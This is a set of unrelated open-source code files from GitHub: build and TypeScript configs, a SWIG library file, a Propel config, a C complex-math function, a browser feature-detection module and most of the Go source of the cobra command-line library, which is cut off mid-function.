"@types/jasminewd2": "~2.0.2",
"@types/node": "~6.0.60",
"codelyzer": "^4.0.1",
"jasmine-core": "~2.8.0",
"jasmine-spec-reporter": "~4.2.1",
"karma": "~2.0.0",
"karma-chrome-launcher": "~2.2.0",
"karma-coverage-istanbul-reporter": "^1.2.1",
"karma-jasmine": "~1.1.0",
"karma-jasmine-html-reporter": "^0.2.2",
"protractor": "~5.1.2",
"ts-node": "~4.1.0",
"tslint": "~5.9.1",
"typescript": "~2.5.3"
}
}
| {
"pile_set_name": "Github"
} |
{
"extends": "./tsconfig.json",
"compilerOptions": {
"outDir": "../../dist/out-tsc",
"module": "commonjs",
"types": ["jest", "node"]
},
"files": ["src/test-setup.ts"],
"include": ["**/*.spec.ts", "**/*.d.ts"]
}
| {
"pile_set_name": "Github"
} |
/* -----------------------------------------------------------------------------
* attribute.i
*
* SWIG library file for implementing attributes.
* ----------------------------------------------------------------------------- */
/* we use a simple exception warning here: rather than raising a real
 * target-language exception, just print the message to stdout */
%{
#include <stdio.h>
%}
#define %attribute_exception(code,msg) printf("%s\n",msg)
/* fall-back definitions for SWIG helper macros when not already provided */
#ifndef %arg
/* %arg passes a (possibly comma-containing) argument through unchanged */
#define %arg(x...) x
#endif
#ifndef %mangle
/* #@ applies SWIG name mangling to Type, producing an identifier-safe name
   (used by typemaps/attribute.swg below) */
#define %mangle(Type...) #@Type
#endif
%include <typemaps/attribute.swg>
| {
"pile_set_name": "Github"
} |
package jsonpb_gogo
| {
"pile_set_name": "Github"
} |
propel.targetPackage = classes.model
propel.packageObjectModel = true
propel.project = opensource
propel.database = mssql
propel.database.createUrl = mysql://root@localhost/
propel.database.url = mysql://root@localhost/rbac_os
propel.addGenericAccessors = true
propel.addGenericMutators = true
propel.addTimeStamp = false
propel.schema.validate = false
; directories
propel.home = .
propel.output.dir = .
propel.schema.dir = ${propel.output.dir}config
propel.conf.dir = ${propel.output.dir}config
propel.phpconf.dir = ${propel.output.dir}config
propel.sql.dir = ${propel.output.dir}data/mssql
propel.runtime.conf.file = runtime-conf.xml
propel.php.dir = ${propel.output.dir}
propel.default.schema.basename = schema
propel.datadump.mapper.from = *schema.xml
propel.datadump.mapper.to = *data.xml
; builder settings
;_propel.builder.peer.class = addon.propel.builder.SfPeerBuilder
;propel.builder.object.class = addon.propel.builder.SfObjectBuilder
;propel.builder.objectstub.class = addon.propel.builder.SfExtensionObjectBuilder
;propel.builder.peerstub.class = addon.propel.builder.SfExtensionPeerBuilder
;propel.builder.objectmultiextend.class = addon.propel.builder.SfMultiExtendObjectBuilder
;propel.builder.mapbuilder.class = addon.propel.builder.SfMapBuilderBuilder
propel.builder.interface.class = propel.engine.builder.om.php5.PHP5InterfaceBuilder
propel.builder.node.class = propel.engine.builder.om.php5.PHP5NodeBuilder
propel.builder.nodepeer.class = propel.engine.builder.om.php5.PHP5NodePeerBuilder
propel.builder.nodestub.class = propel.engine.builder.om.php5.PHP5ExtensionNodeBuilder
propel.builder.nodepeerstub.class = propel.engine.builder.om.php5.PHP5ExtensionNodePeerBuilder
propel.builder.addIncludes = false
propel.builder.addComments = false
propel.builder.addBehaviors = false
| {
"pile_set_name": "Github"
} |
#include "libm.h"
/* asinh(z) = -i asin(i z) */
double complex casinh(double complex z)
{
z = casin(CMPLX(-cimag(z), creal(z)));
return CMPLX(cimag(z), -creal(z));
}
| {
"pile_set_name": "Github"
} |
import _debug from 'debug'
const debug = _debug('peercalls')
/**
 * Feature-detect the browser capabilities this app depends on.
 *
 * Pure capability probing — no side effects beyond a debug log. Checks
 * getUserMedia/enumerateDevices, MediaStream, text/binary buffer support,
 * WebRTC insertable streams, RTCPeerConnection data channels, WebSockets
 * and Web Workers.
 *
 * @returns an object with one boolean per probed feature
 */
export function getBrowserFeatures() {
  // navigator.mediaDevices with both capture and enumeration entry points.
  const media =
    'mediaDevices' in navigator &&
    typeof navigator.mediaDevices === 'object' &&
    typeof navigator.mediaDevices.getUserMedia === 'function' &&
    typeof navigator.mediaDevices.enumerateDevices === 'function'
  const mediaStream =
    typeof MediaStream === 'function' && typeof MediaStreamTrack === 'function'
  // Binary/text handling primitives.
  const buffers =
    typeof TextEncoder === 'function' && typeof TextDecoder === 'function' &&
    typeof ArrayBuffer === 'function' && typeof Uint8Array === 'function'
  // Insertable streams (encoded transform) — non-standard API; may be absent.
  const insertableStreams =
    typeof RTCRtpSender === 'function' &&
    typeof RTCRtpSender.prototype.createEncodedStreams === 'function'
  // Fixed: use strict equality (===) like every other check in this function.
  const webrtc =
    typeof RTCPeerConnection === 'function' &&
    typeof RTCPeerConnection.prototype === 'object' &&
    typeof RTCPeerConnection.prototype.createDataChannel === 'function'
  const websockets =
    typeof WebSocket === 'function'
  const webworkers =
    typeof Worker === 'function'
  const features = {
    media,
    mediaStream,
    buffers,
    insertableStreams,
    webrtc,
    websockets,
    webworkers,
  }
  debug('browser features supported: %o', features)
  return features
}
| {
"pile_set_name": "Github"
} |
// Copyright © 2013 Steve Francia <[email protected]>.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Package cobra is a commander providing a simple interface to create powerful modern CLI interfaces.
// In addition to providing an interface, Cobra simultaneously provides a controller to organize your application code.
package cobra
import (
"bytes"
"context"
"fmt"
"io"
"os"
"path/filepath"
"sort"
"strings"
flag "github.com/spf13/pflag"
)
// FParseErrWhitelist configures Flag parse errors to be ignored
type FParseErrWhitelist flag.ParseErrorsWhitelist
// Command is just that, a command for your application.
// E.g. 'go run ...' - 'run' is the command. Cobra requires
// you to define the usage and description as part of your command
// definition to ensure usability.
type Command struct {
// Use is the one-line usage message.
Use string
// Aliases is an array of aliases that can be used instead of the first word in Use.
Aliases []string
// SuggestFor is an array of command names for which this command will be suggested -
// similar to aliases but only suggests.
SuggestFor []string
// Short is the short description shown in the 'help' output.
Short string
// Long is the long message shown in the 'help <this-command>' output.
Long string
// Example is examples of how to use the command.
Example string
// ValidArgs is list of all valid non-flag arguments that are accepted in bash completions
ValidArgs []string
// ValidArgsFunction is an optional function that provides valid non-flag arguments for bash completion.
// It is a dynamic version of using ValidArgs.
// Only one of ValidArgs and ValidArgsFunction can be used for a command.
ValidArgsFunction func(cmd *Command, args []string, toComplete string) ([]string, ShellCompDirective)
// Expected arguments
Args PositionalArgs
// ArgAliases is List of aliases for ValidArgs.
// These are not suggested to the user in the bash completion,
// but accepted if entered manually.
ArgAliases []string
// BashCompletionFunction is custom functions used by the bash autocompletion generator.
BashCompletionFunction string
// Deprecated defines, if this command is deprecated and should print this string when used.
Deprecated string
// Hidden defines, if this command is hidden and should NOT show up in the list of available commands.
Hidden bool
// Annotations are key/value pairs that can be used by applications to identify or
// group commands.
Annotations map[string]string
// Version defines the version for this command. If this value is non-empty and the command does not
// define a "version" flag, a "version" boolean flag will be added to the command and, if specified,
// will print content of the "Version" variable. A shorthand "v" flag will also be added if the
// command does not define one.
Version string
// The *Run functions are executed in the following order:
// * PersistentPreRun()
// * PreRun()
// * Run()
// * PostRun()
// * PersistentPostRun()
// All functions get the same args, the arguments after the command name.
//
// PersistentPreRun: children of this command will inherit and execute.
PersistentPreRun func(cmd *Command, args []string)
// PersistentPreRunE: PersistentPreRun but returns an error.
PersistentPreRunE func(cmd *Command, args []string) error
// PreRun: children of this command will not inherit.
PreRun func(cmd *Command, args []string)
// PreRunE: PreRun but returns an error.
PreRunE func(cmd *Command, args []string) error
// Run: Typically the actual work function. Most commands will only implement this.
Run func(cmd *Command, args []string)
// RunE: Run but returns an error.
RunE func(cmd *Command, args []string) error
// PostRun: run after the Run command.
PostRun func(cmd *Command, args []string)
// PostRunE: PostRun but returns an error.
PostRunE func(cmd *Command, args []string) error
// PersistentPostRun: children of this command will inherit and execute after PostRun.
PersistentPostRun func(cmd *Command, args []string)
// PersistentPostRunE: PersistentPostRun but returns an error.
PersistentPostRunE func(cmd *Command, args []string) error
// SilenceErrors is an option to quiet errors down stream.
SilenceErrors bool
// SilenceUsage is an option to silence usage when an error occurs.
SilenceUsage bool
// DisableFlagParsing disables the flag parsing.
// If this is true all flags will be passed to the command as arguments.
DisableFlagParsing bool
// DisableAutoGenTag defines, if gen tag ("Auto generated by spf13/cobra...")
// will be printed by generating docs for this command.
DisableAutoGenTag bool
// DisableFlagsInUseLine will disable the addition of [flags] to the usage
// line of a command when printing help or generating docs
DisableFlagsInUseLine bool
// DisableSuggestions disables the suggestions based on Levenshtein distance
// that go along with 'unknown command' messages.
DisableSuggestions bool
// SuggestionsMinimumDistance defines minimum levenshtein distance to display suggestions.
// Must be > 0.
SuggestionsMinimumDistance int
// TraverseChildren parses flags on all parents before executing child command.
TraverseChildren bool
// FParseErrWhitelist flag parse errors to be ignored
FParseErrWhitelist FParseErrWhitelist
ctx context.Context
// commands is the list of commands supported by this program.
commands []*Command
// parent is a parent command for this command.
parent *Command
// Max lengths of commands' string lengths for use in padding.
commandsMaxUseLen int
commandsMaxCommandPathLen int
commandsMaxNameLen int
// commandsAreSorted defines, if command slice are sorted or not.
commandsAreSorted bool
// commandCalledAs is the name or alias value used to call this command.
commandCalledAs struct {
name string
called bool
}
// args is actual args parsed from flags.
args []string
// flagErrorBuf contains all error messages from pflag.
flagErrorBuf *bytes.Buffer
// flags is full set of flags.
flags *flag.FlagSet
// pflags contains persistent flags.
pflags *flag.FlagSet
// lflags contains local flags.
lflags *flag.FlagSet
// iflags contains inherited flags.
iflags *flag.FlagSet
// parentsPflags is all persistent flags of cmd's parents.
parentsPflags *flag.FlagSet
// globNormFunc is the global normalization function
// that we can use on every pflag set and children commands
globNormFunc func(f *flag.FlagSet, name string) flag.NormalizedName
// usageFunc is usage func defined by user.
usageFunc func(*Command) error
// usageTemplate is usage template defined by user.
usageTemplate string
// flagErrorFunc is func defined by user and it's called when the parsing of
// flags returns an error.
flagErrorFunc func(*Command, error) error
// helpTemplate is help template defined by user.
helpTemplate string
// helpFunc is help func defined by user.
helpFunc func(*Command, []string)
// helpCommand is command with usage 'help'. If it's not defined by user,
// cobra uses default help command.
helpCommand *Command
// versionTemplate is the version template defined by user.
versionTemplate string
// inReader is a reader defined by the user that replaces stdin
inReader io.Reader
// outWriter is a writer defined by the user that replaces stdout
outWriter io.Writer
// errWriter is a writer defined by the user that replaces stderr
errWriter io.Writer
}
// Context returns underlying command context. If command wasn't
// executed with ExecuteContext Context returns Background context.
func (c *Command) Context() context.Context {
return c.ctx
}
// SetArgs sets arguments for the command. It is set to os.Args[1:] by default, if desired, can be overridden
// particularly useful when testing.
func (c *Command) SetArgs(a []string) {
c.args = a
}
// SetOutput sets the destination for usage and error messages.
// If output is nil, os.Stderr is used.
// Deprecated: Use SetOut and/or SetErr instead
func (c *Command) SetOutput(output io.Writer) {
c.outWriter = output
c.errWriter = output
}
// SetOut sets the destination for usage messages.
// If newOut is nil, os.Stdout is used.
func (c *Command) SetOut(newOut io.Writer) {
c.outWriter = newOut
}
// SetErr sets the destination for error messages.
// If newErr is nil, os.Stderr is used.
func (c *Command) SetErr(newErr io.Writer) {
c.errWriter = newErr
}
// SetIn sets the source for input data
// If newIn is nil, os.Stdin is used.
func (c *Command) SetIn(newIn io.Reader) {
c.inReader = newIn
}
// SetUsageFunc sets usage function. Usage can be defined by application.
func (c *Command) SetUsageFunc(f func(*Command) error) {
c.usageFunc = f
}
// SetUsageTemplate sets usage template. Can be defined by Application.
func (c *Command) SetUsageTemplate(s string) {
c.usageTemplate = s
}
// SetFlagErrorFunc sets a function to generate an error when flag parsing
// fails.
func (c *Command) SetFlagErrorFunc(f func(*Command, error) error) {
c.flagErrorFunc = f
}
// SetHelpFunc sets help function. Can be defined by Application.
func (c *Command) SetHelpFunc(f func(*Command, []string)) {
c.helpFunc = f
}
// SetHelpCommand sets help command.
func (c *Command) SetHelpCommand(cmd *Command) {
c.helpCommand = cmd
}
// SetHelpTemplate sets help template to be used. Application can use it to set custom template.
func (c *Command) SetHelpTemplate(s string) {
c.helpTemplate = s
}
// SetVersionTemplate sets version template to be used. Application can use it to set custom template.
func (c *Command) SetVersionTemplate(s string) {
c.versionTemplate = s
}
// SetGlobalNormalizationFunc sets a normalization function to all flag sets and also to child commands.
// The user should not have a cyclic dependency on commands.
func (c *Command) SetGlobalNormalizationFunc(n func(f *flag.FlagSet, name string) flag.NormalizedName) {
c.Flags().SetNormalizeFunc(n)
c.PersistentFlags().SetNormalizeFunc(n)
c.globNormFunc = n
for _, command := range c.commands {
command.SetGlobalNormalizationFunc(n)
}
}
// OutOrStdout returns output to stdout.
func (c *Command) OutOrStdout() io.Writer {
return c.getOut(os.Stdout)
}
// OutOrStderr returns output to stderr
func (c *Command) OutOrStderr() io.Writer {
return c.getOut(os.Stderr)
}
// ErrOrStderr returns output to stderr
func (c *Command) ErrOrStderr() io.Writer {
return c.getErr(os.Stderr)
}
// InOrStdin returns input to stdin
func (c *Command) InOrStdin() io.Reader {
return c.getIn(os.Stdin)
}
func (c *Command) getOut(def io.Writer) io.Writer {
if c.outWriter != nil {
return c.outWriter
}
if c.HasParent() {
return c.parent.getOut(def)
}
return def
}
func (c *Command) getErr(def io.Writer) io.Writer {
if c.errWriter != nil {
return c.errWriter
}
if c.HasParent() {
return c.parent.getErr(def)
}
return def
}
func (c *Command) getIn(def io.Reader) io.Reader {
if c.inReader != nil {
return c.inReader
}
if c.HasParent() {
return c.parent.getIn(def)
}
return def
}
// UsageFunc returns either the function set by SetUsageFunc for this command
// or a parent, or it returns a default usage function.
func (c *Command) UsageFunc() (f func(*Command) error) {
if c.usageFunc != nil {
return c.usageFunc
}
if c.HasParent() {
return c.Parent().UsageFunc()
}
return func(c *Command) error {
c.mergePersistentFlags()
err := tmpl(c.OutOrStderr(), c.UsageTemplate(), c)
if err != nil {
c.Println(err)
}
return err
}
}
// Usage puts out the usage for the command.
// Used when a user provides invalid input.
// Can be defined by user by overriding UsageFunc.
func (c *Command) Usage() error {
return c.UsageFunc()(c)
}
// HelpFunc returns either the function set by SetHelpFunc for this command
// or a parent, or it returns a function with default help behavior.
func (c *Command) HelpFunc() func(*Command, []string) {
if c.helpFunc != nil {
return c.helpFunc
}
if c.HasParent() {
return c.Parent().HelpFunc()
}
return func(c *Command, a []string) {
c.mergePersistentFlags()
// The help should be sent to stdout
// See https://github.com/spf13/cobra/issues/1002
err := tmpl(c.OutOrStdout(), c.HelpTemplate(), c)
if err != nil {
c.Println(err)
}
}
}
// Help puts out the help for the command.
// Used when a user calls help [command].
// Can be defined by user by overriding HelpFunc.
func (c *Command) Help() error {
c.HelpFunc()(c, []string{})
return nil
}
// UsageString returns usage string.
func (c *Command) UsageString() string {
// Storing normal writers
tmpOutput := c.outWriter
tmpErr := c.errWriter
bb := new(bytes.Buffer)
c.outWriter = bb
c.errWriter = bb
c.Usage()
// Setting things back to normal
c.outWriter = tmpOutput
c.errWriter = tmpErr
return bb.String()
}
// FlagErrorFunc returns either the function set by SetFlagErrorFunc for this
// command or a parent, or it returns a function which returns the original
// error.
func (c *Command) FlagErrorFunc() (f func(*Command, error) error) {
if c.flagErrorFunc != nil {
return c.flagErrorFunc
}
if c.HasParent() {
return c.parent.FlagErrorFunc()
}
return func(c *Command, err error) error {
return err
}
}
var minUsagePadding = 25
// UsagePadding return padding for the usage.
func (c *Command) UsagePadding() int {
if c.parent == nil || minUsagePadding > c.parent.commandsMaxUseLen {
return minUsagePadding
}
return c.parent.commandsMaxUseLen
}
var minCommandPathPadding = 11
// CommandPathPadding return padding for the command path.
func (c *Command) CommandPathPadding() int {
if c.parent == nil || minCommandPathPadding > c.parent.commandsMaxCommandPathLen {
return minCommandPathPadding
}
return c.parent.commandsMaxCommandPathLen
}
var minNamePadding = 11
// NamePadding returns padding for the name.
func (c *Command) NamePadding() int {
if c.parent == nil || minNamePadding > c.parent.commandsMaxNameLen {
return minNamePadding
}
return c.parent.commandsMaxNameLen
}
// UsageTemplate returns usage template for the command.
func (c *Command) UsageTemplate() string {
if c.usageTemplate != "" {
return c.usageTemplate
}
if c.HasParent() {
return c.parent.UsageTemplate()
}
return `Usage:{{if .Runnable}}
{{.UseLine}}{{end}}{{if .HasAvailableSubCommands}}
{{.CommandPath}} [command]{{end}}{{if gt (len .Aliases) 0}}
Aliases:
{{.NameAndAliases}}{{end}}{{if .HasExample}}
Examples:
{{.Example}}{{end}}{{if .HasAvailableSubCommands}}
Available Commands:{{range .Commands}}{{if (or .IsAvailableCommand (eq .Name "help"))}}
{{rpad .Name .NamePadding }} {{.Short}}{{end}}{{end}}{{end}}{{if .HasAvailableLocalFlags}}
Flags:
{{.LocalFlags.FlagUsages | trimTrailingWhitespaces}}{{end}}{{if .HasAvailableInheritedFlags}}
Global Flags:
{{.InheritedFlags.FlagUsages | trimTrailingWhitespaces}}{{end}}{{if .HasHelpSubCommands}}
Additional help topics:{{range .Commands}}{{if .IsAdditionalHelpTopicCommand}}
{{rpad .CommandPath .CommandPathPadding}} {{.Short}}{{end}}{{end}}{{end}}{{if .HasAvailableSubCommands}}
Use "{{.CommandPath}} [command] --help" for more information about a command.{{end}}
`
}
// HelpTemplate return help template for the command.
func (c *Command) HelpTemplate() string {
if c.helpTemplate != "" {
return c.helpTemplate
}
if c.HasParent() {
return c.parent.HelpTemplate()
}
return `{{with (or .Long .Short)}}{{. | trimTrailingWhitespaces}}
{{end}}{{if or .Runnable .HasSubCommands}}{{.UsageString}}{{end}}`
}
// VersionTemplate return version template for the command.
func (c *Command) VersionTemplate() string {
if c.versionTemplate != "" {
return c.versionTemplate
}
if c.HasParent() {
return c.parent.VersionTemplate()
}
return `{{with .Name}}{{printf "%s " .}}{{end}}{{printf "version %s" .Version}}
`
}
// hasNoOptDefVal reports whether the named long flag exists in fs and has a
// NoOptDefVal set (i.e. it may be given on the command line without a value).
func hasNoOptDefVal(name string, fs *flag.FlagSet) bool {
	f := fs.Lookup(name)
	return f != nil && f.NoOptDefVal != ""
}
// shortHasNoOptDefVal reports whether the shorthand flag named by the first
// character of name exists in fs and has a NoOptDefVal set.
func shortHasNoOptDefVal(name string, fs *flag.FlagSet) bool {
	if name == "" {
		return false
	}
	f := fs.ShorthandLookup(name[:1])
	return f != nil && f.NoOptDefVal != ""
}
// stripFlags returns the non-flag tokens of args — the candidate
// (sub)command words — using c's merged flag set to decide which tokens are
// flag values that must be skipped rather than treated as commands.
func stripFlags(args []string, c *Command) []string {
if len(args) == 0 {
return args
}
c.mergePersistentFlags()
commands := []string{}
flags := c.Flags()
Loop:
for len(args) > 0 {
s := args[0]
args = args[1:]
switch {
case s == "--":
// "--" terminates the flags
break Loop
case strings.HasPrefix(s, "--") && !strings.Contains(s, "=") && !hasNoOptDefVal(s[2:], flags):
// If '--flag arg' then
// delete arg from args.
fallthrough // (do the same as below)
case strings.HasPrefix(s, "-") && !strings.Contains(s, "=") && len(s) == 2 && !shortHasNoOptDefVal(s[1:], flags):
// If '-f arg' then
// delete 'arg' from args or break the loop if len(args) <= 1.
if len(args) <= 1 {
break Loop
} else {
args = args[1:]
continue
}
case s != "" && !strings.HasPrefix(s, "-"):
// A bare word: record it as a command token.
commands = append(commands, s)
}
}
return commands
}
// argsMinusFirstX returns args with only the first occurrence of x removed;
// later duplicates are kept. Otherwise commands like
// "openshift admin policy add-role-to-user admin my-user" would lose the
// second "admin" argument. If x is absent, args is returned unchanged.
func argsMinusFirstX(args []string, x string) []string {
	for i, arg := range args {
		if arg != x {
			continue
		}
		trimmed := make([]string, 0, len(args)-1)
		trimmed = append(trimmed, args[:i]...)
		return append(trimmed, args[i+1:]...)
	}
	return args
}
// isFlagArg reports whether arg looks like a command-line flag token:
// either a long flag ("--name", with at least one character after the
// dashes) or a short flag ("-x", a dash followed by a non-dash character).
//
// Fix: the long-flag branch previously only checked arg[1] == '-', so any
// token with '-' as its second character (e.g. "a-b") was misclassified as
// a flag; it now requires the leading "--" prefix.
func isFlagArg(arg string) bool {
	// Long flag: "--" prefix with at least one trailing character.
	if len(arg) >= 3 && arg[0] == '-' && arg[1] == '-' {
		return true
	}
	// Short flag: single leading dash followed by a non-dash character.
	return len(arg) >= 2 && arg[0] == '-' && arg[1] != '-'
}
// Find the target command given the args and command tree
// Meant to be run on the highest node. Only searches down.
func (c *Command) Find(args []string) (*Command, []string, error) {
var innerfind func(*Command, []string) (*Command, []string)
innerfind = func(c *Command, innerArgs []string) (*Command, []string) {
argsWOflags := stripFlags(innerArgs, c)
if len(argsWOflags) == 0 {
return c, innerArgs
}
nextSubCmd := argsWOflags[0]
cmd := c.findNext(nextSubCmd)
if cmd != nil {
return innerfind(cmd, argsMinusFirstX(innerArgs, nextSubCmd))
}
return c, innerArgs
}
commandFound, a := innerfind(c, args)
if commandFound.Args == nil {
return commandFound, a, legacyArgs(commandFound, stripFlags(a, commandFound))
}
return commandFound, a, nil
}
func (c *Command) findSuggestions(arg string) string {
if c.DisableSuggestions {
return ""
}
if c.SuggestionsMinimumDistance <= 0 {
c.SuggestionsMinimumDistance = 2
}
suggestionsString := ""
if suggestions := c.SuggestionsFor(arg); len(suggestions) > 0 {
suggestionsString += "\n\nDid you mean this?\n"
for _, s := range suggestions {
suggestionsString += fmt.Sprintf("\t%v\n", s)
}
}
return suggestionsString
}
func (c *Command) findNext(next string) *Command {
matches := make([]*Command, 0)
for _, cmd := range c.commands {
if cmd.Name() == next || cmd.HasAlias(next) {
cmd.commandCalledAs.name = next
return cmd
}
if EnablePrefixMatching && cmd.hasNameOrAliasPrefix(next) {
matches = append(matches, cmd)
}
}
if len(matches) == 1 {
return matches[0]
}
return nil
}
// Traverse the command tree to find the command, and parse args for
// each parent.
func (c *Command) Traverse(args []string) (*Command, []string, error) {
flags := []string{}
inFlag := false
for i, arg := range args {
switch {
// A long flag with a space separated value
case strings.HasPrefix(arg, "--") && !strings.Contains(arg, "="):
// TODO: this isn't quite right, we should really check ahead for 'true' or 'false'
inFlag = !hasNoOptDefVal(arg[2:], c.Flags())
flags = append(flags, arg)
continue
// A short flag with a space separated value
case strings.HasPrefix(arg, "-") && !strings.Contains(arg, "=") && len(arg) == 2 && !shortHasNoOptDefVal(arg[1:], c.Flags()):
inFlag = true
flags = append(flags, arg)
continue
// The value for a flag
case inFlag:
inFlag = false
flags = append(flags, arg)
continue
// A flag without a value, or with an `=` separated value
case isFlagArg(arg):
flags = append(flags, arg)
continue
}
cmd := c.findNext(arg)
if cmd == nil {
return c, args, nil
}
if err := c.ParseFlags(flags); err != nil {
return nil, args, err
}
return cmd.Traverse(args[i+1:])
}
return c, args, nil
}
// SuggestionsFor provides suggestions for the typedName.
func (c *Command) SuggestionsFor(typedName string) []string {
suggestions := []string{}
for _, cmd := range c.commands {
if cmd.IsAvailableCommand() {
levenshteinDistance := ld(typedName, cmd.Name(), true)
suggestByLevenshtein := levenshteinDistance <= c.SuggestionsMinimumDistance
suggestByPrefix := strings.HasPrefix(strings.ToLower(cmd.Name()), strings.ToLower(typedName))
if suggestByLevenshtein || suggestByPrefix {
suggestions = append(suggestions, cmd.Name())
}
for _, explicitSuggestion := range cmd.SuggestFor {
if strings.EqualFold(typedName, explicitSuggestion) {
suggestions = append(suggestions, cmd.Name())
}
}
}
}
return suggestions
}
// VisitParents walks up the command tree from c, invoking fn on each parent
// (nearest parent first, root last). c itself is not visited.
func (c *Command) VisitParents(fn func(*Command)) {
	if !c.HasParent() {
		return
	}
	parent := c.Parent()
	fn(parent)
	parent.VisitParents(fn)
}
// Root walks up the command tree and returns the top-level command. A
// command with no parent is its own root.
func (c *Command) Root() *Command {
	cmd := c
	for cmd.HasParent() {
		cmd = cmd.Parent()
	}
	return cmd
}
// ArgsLenAtDash will return the length of c.Flags().Args at the moment
// when a -- was found during args parsing.
func (c *Command) ArgsLenAtDash() int {
return c.Flags().ArgsLenAtDash()
}
// execute runs the full lifecycle of an already-resolved command with the
// given raw arguments: flag parsing, help/version short-circuits, argument
// validation, then the hook chain
// PersistentPreRun -> PreRun -> Run -> PostRun -> PersistentPostRun
// (the E-suffixed variant of each hook takes precedence and may abort with
// an error). Returns flag.ErrHelp when help was requested or the command is
// not runnable.
func (c *Command) execute(a []string) (err error) {
if c == nil {
return fmt.Errorf("Called Execute() on a nil Command")
}
if len(c.Deprecated) > 0 {
c.Printf("Command %q is deprecated, %s\n", c.Name(), c.Deprecated)
}
// initialize help and version flag at the last point possible to allow for user
// overriding
c.InitDefaultHelpFlag()
c.InitDefaultVersionFlag()
err = c.ParseFlags(a)
if err != nil {
return c.FlagErrorFunc()(c, err)
}
// If help is called, regardless of other flags, return we want help.
// Also say we need help if the command isn't runnable.
helpVal, err := c.Flags().GetBool("help")
if err != nil {
// should be impossible to get here as we always declare a help
// flag in InitDefaultHelpFlag()
c.Println("\"help\" flag declared as non-bool. Please correct your code")
return err
}
if helpVal {
return flag.ErrHelp
}
// for back-compat, only add version flag behavior if version is defined
if c.Version != "" {
versionVal, err := c.Flags().GetBool("version")
if err != nil {
c.Println("\"version\" flag declared as non-bool. Please correct your code")
return err
}
if versionVal {
err := tmpl(c.OutOrStdout(), c.VersionTemplate(), c)
if err != nil {
c.Println(err)
}
return err
}
}
if !c.Runnable() {
return flag.ErrHelp
}
c.preRun()
argWoFlags := c.Flags().Args()
if c.DisableFlagParsing {
// With flag parsing disabled, the raw args are passed through untouched.
argWoFlags = a
}
if err := c.ValidateArgs(argWoFlags); err != nil {
return err
}
// Only the nearest ancestor (or c itself) that defines a
// PersistentPreRun(E) hook runs it; the walk stops at the first match.
for p := c; p != nil; p = p.Parent() {
if p.PersistentPreRunE != nil {
if err := p.PersistentPreRunE(c, argWoFlags); err != nil {
return err
}
break
} else if p.PersistentPreRun != nil {
p.PersistentPreRun(c, argWoFlags)
break
}
}
if c.PreRunE != nil {
if err := c.PreRunE(c, argWoFlags); err != nil {
return err
}
} else if c.PreRun != nil {
c.PreRun(c, argWoFlags)
}
// Required flags are only enforced after the pre-run hooks have run.
if err := c.validateRequiredFlags(); err != nil {
return err
}
// RunE takes precedence over Run when both are set.
if c.RunE != nil {
if err := c.RunE(c, argWoFlags); err != nil {
return err
}
} else {
c.Run(c, argWoFlags)
}
if c.PostRunE != nil {
if err := c.PostRunE(c, argWoFlags); err != nil {
return err
}
} else if c.PostRun != nil {
c.PostRun(c, argWoFlags)
}
// Mirror of the pre-run walk: only the nearest PersistentPostRun(E) runs.
for p := c; p != nil; p = p.Parent() {
if p.PersistentPostRunE != nil {
if err := p.PersistentPostRunE(c, argWoFlags); err != nil {
return err
}
break
} else if p.PersistentPostRun != nil {
p.PersistentPostRun(c, argWoFlags)
break
}
}
return nil
}
// preRun invokes every initializer registered via OnInitialize, in order.
func (c *Command) preRun() {
	for _, initFn := range initializers {
		initFn()
	}
}
// ExecuteContext is the same as Execute(), but sets the ctx on the command.
// Retrieve ctx by calling cmd.Context() inside your *Run lifecycle functions.
// The context is stored on the root command and propagated to the executed
// child inside ExecuteC.
func (c *Command) ExecuteContext(ctx context.Context) error {
	c.ctx = ctx
	return c.Execute()
}
// Execute uses the args (os.Args[1:] by default)
// and run through the command tree finding appropriate matches
// for commands and then corresponding flags.
// It is a thin wrapper around ExecuteC that discards the resolved command.
func (c *Command) Execute() error {
	_, err := c.ExecuteC()
	return err
}
// ExecuteC executes the command tree rooted at c and returns the command that
// was ultimately resolved and run, together with any error. Execution always
// restarts from the root command regardless of which command it is called on.
func (c *Command) ExecuteC() (cmd *Command, err error) {
	if c.ctx == nil {
		c.ctx = context.Background()
	}

	// Regardless of what command execute is called on, run on Root only
	if c.HasParent() {
		return c.Root().ExecuteC()
	}

	// windows hook
	if preExecHookFn != nil {
		preExecHookFn(c)
	}

	// initialize help as the last point possible to allow for user
	// overriding
	c.InitDefaultHelpCmd()

	args := c.args

	// Workaround FAIL with "go test -v" or "cobra.test -test.v", see #155
	if c.args == nil && filepath.Base(os.Args[0]) != "cobra.test" {
		args = os.Args[1:]
	}

	// initialize the hidden command to be used for bash completion
	c.initCompleteCmd(args)

	// Resolve the target subcommand and its flag arguments.
	var flags []string
	if c.TraverseChildren {
		cmd, flags, err = c.Traverse(args)
	} else {
		cmd, flags, err = c.Find(args)
	}
	if err != nil {
		// If found parse to a subcommand and then failed, talk about the subcommand
		if cmd != nil {
			c = cmd
		}
		if !c.SilenceErrors {
			c.Println("Error:", err.Error())
			c.Printf("Run '%v --help' for usage.\n", c.CommandPath())
		}
		return c, err
	}

	cmd.commandCalledAs.called = true
	if cmd.commandCalledAs.name == "" {
		cmd.commandCalledAs.name = cmd.Name()
	}

	// We have to pass global context to children command
	// if context is present on the parent command.
	if cmd.ctx == nil {
		cmd.ctx = c.ctx
	}

	err = cmd.execute(flags)
	if err != nil {
		// Always show help if requested, even if SilenceErrors is in
		// effect
		if err == flag.ErrHelp {
			cmd.HelpFunc()(cmd, args)
			return cmd, nil
		}

		// If root command has SilentErrors flagged,
		// all subcommands should respect it
		if !cmd.SilenceErrors && !c.SilenceErrors {
			c.Println("Error:", err.Error())
		}

		// If root command has SilentUsage flagged,
		// all subcommands should respect it
		if !cmd.SilenceUsage && !c.SilenceUsage {
			c.Println(cmd.UsageString())
		}
	}
	return cmd, err
}
// ValidateArgs runs the command's Args validator against args, if one is set.
// A command with no validator accepts any arguments.
func (c *Command) ValidateArgs(args []string) error {
	if c.Args != nil {
		return c.Args(c, args)
	}
	return nil
}
// validateRequiredFlags returns an error naming every flag that was marked
// required (via the BashCompOneRequiredFlag annotation) but not set.
func (c *Command) validateRequiredFlags() error {
	missing := []string{}
